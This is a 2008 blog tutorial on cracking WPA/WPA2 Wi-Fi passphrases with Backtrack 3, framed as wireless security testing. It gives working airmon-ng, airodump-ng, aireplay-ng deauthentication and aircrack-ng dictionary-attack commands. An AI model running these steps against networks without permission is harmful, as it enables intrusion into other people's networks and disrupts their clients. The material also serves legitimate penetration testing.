Saturday, December 27, 2008

Hacking WPA/WPA2 with Backtrack 3

WPA is an encryption scheme designed to secure the wireless network of your home or office from intruders and eavesdroppers. It is reportedly safer than WEP. There have been numerous attempts to break WEP and WPA encryption with mixed results. This tutorial discusses currently available techniques for testing the wireless network security. Be aware that breaking into your neighbor's network without permission is wrong.

What You Need

To test security of wireless networks, you can use the live CD Linux distribution called Backtrack. You can download its latest ISO image from and burn it with any CD burner program like InfraRecorder or CDBurnerXP. Alternatively, you can try the SliTaz Aircrack-NG distribution which is lighter and simpler than Backtrack.

Here's a list of what you need to crack WPA/WPA2:

Reboot your computer with a Backtrack CD and you'll be presented with the KDE environment.

Surveying Wireless Networks with Kismet

Launch Konsole which is located right next to the KDE Start menu. Open /usr/local/etc/kismet.conf in a text editor and edit the source= line to include your wireless device. For example, for Broadcom 43xx based card, put source=bcm43xx,eth1,bcm43xx. Refer to Kismet documentation section 12. Save kismet.conf and start kismet.

Once kismet starts detecting wireless networks around, press s and P to sort the network list by packet counts in descending order. Press Up or Down key to move to the target network and press i for network information or c for client list. Write down such information as:

  • ESSID (wireless network name)
  • BSSID (MAC address of access point)
  • channel of wireless network
  • MAC address of clients

Press x to close popup windows and Q to exit Kismet.

Brute-Force Dictionary Attack

This is the classic brute-force attack.

airmon-ng stop wlan0
airmon-ng start wlan0

The commands above put your wireless device in monitor mode. The monitor mode is the mode whereby your wireless card can listen to wireless traffic passively. Replace wlan0 with your wireless device name, such as eth1. Type iwconfig to make sure your card is in monitor mode.

airodump-ng -w test wlan0

Skip the step above if you used Kismet as in the previous section. Here airodump-ng is used to survey the wi-fi networks. Press Ctrl+C to stop airodump-ng. Copy BSSID (MAC address) of the target network.

airodump-ng -w logfile -c 3 --bssid A0:B1:C2:D3:E4:F5 wlan0

Sniff and log the target network (specified with --bssid option) on the specified channel (-c option) to the specified log file (-w option). Wait until WPA Handshake message appears on the screen. Then, stop airodump-ng by pressing Ctrl+C.

Optionally, if you see a client connected to the target network but no authentication handshake, then you can deauthenticate the client by running the following example command in a separate terminal:

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0

where -a option specifies the access point and -c option specifies the client to deauthenticate. Hopefully, the command above will trick the client to renegotiate a 4-way authentication handshake with the access point. Otherwise, you'll have to wait until a handshake message shows up on airodump-ng outpout.

zcat /pentest/password/pico/cowpatty/final-wordlist.txt.gz > /tmp/wordlist.txt
aircrack-ng -a 2 -w /tmp/wordlist.txt logfile*.cap

Begin a brute-force dictionary attack using the saved log file(s) and the specified dictionary (-w option). Aircrack-ng will try every word in the dictionary until the correct passphrase is found. It may take hours or several days depending on the size of dictionary and the speed of your CPU to try every word in the dictionary. However, if the passphrase is not found in the dictionary or made up of random alphanumeric characters, then you are out of luck and just wasting your time. In this case, the dictionary attack won't be any good.

Finding a Good Dictionary

You need a good dictionary to crack WPA. Backtract 3 CD has wordlist files at the following locations:


Also, aircrack FAQ page has an extensive list of places where you can download good wordlists from. In addition, I found a good wordlist called here.

Further Readings

About This Blog

KBlog logo This blog seeks to provide useful information to people, based on the author's knowledge and experience. Thanks for visiting the blog and posting your comments.

© Contents by KBlog

© Blogger template by Emporium Digital 2008

Follow by Email

Total Pageviews